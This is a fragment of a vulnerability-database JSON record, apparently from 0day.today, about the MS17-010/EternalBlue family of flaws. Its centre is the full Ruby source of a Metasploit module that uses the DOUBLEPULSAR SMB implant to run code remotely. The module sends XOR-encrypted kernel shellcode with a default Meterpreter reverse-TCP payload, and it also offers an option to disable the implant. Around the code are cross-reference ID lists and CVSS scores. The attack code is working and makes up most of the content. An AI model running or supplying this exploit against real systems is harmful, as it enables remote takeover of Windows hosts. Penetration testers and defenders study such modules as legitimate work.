"EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-01T00:13:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-01T00:13:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-01] #"}, "lastseen": "2021-11-01T00:13:44", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ce1a5c0d222e9134766941512598b4f6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-11-01T22:19:22", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": 